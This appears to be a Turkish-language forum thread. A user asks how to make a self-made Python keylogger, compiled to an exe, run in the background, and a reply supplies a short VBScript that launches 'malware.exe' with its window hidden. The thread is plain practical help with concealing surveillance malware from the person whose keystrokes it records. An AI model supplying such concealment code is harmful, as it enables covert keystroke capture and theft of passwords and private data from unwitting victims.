merhaba python bir keylogger aracım var exe ye dönüştürdüm çalışıyor ama ben program açıldıktan sonra arka planda çalışsın istiyorum bunu nasıl yapabilrim ?
Follow along with the video below to see how to install our site as a web app on your home screen.
Not: This feature may not be available in some browsers.
merhaba python bir keylogger aracım var exe ye dönüştürdüm çalışıyor ama ben program açıldıktan sonra arka planda çalışsın istiyorum bunu nasıl yapabilrim ?
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "malware.exe" & Chr(34), 0
Set WshShell = Nothing
' bu bir vbscript kodudur!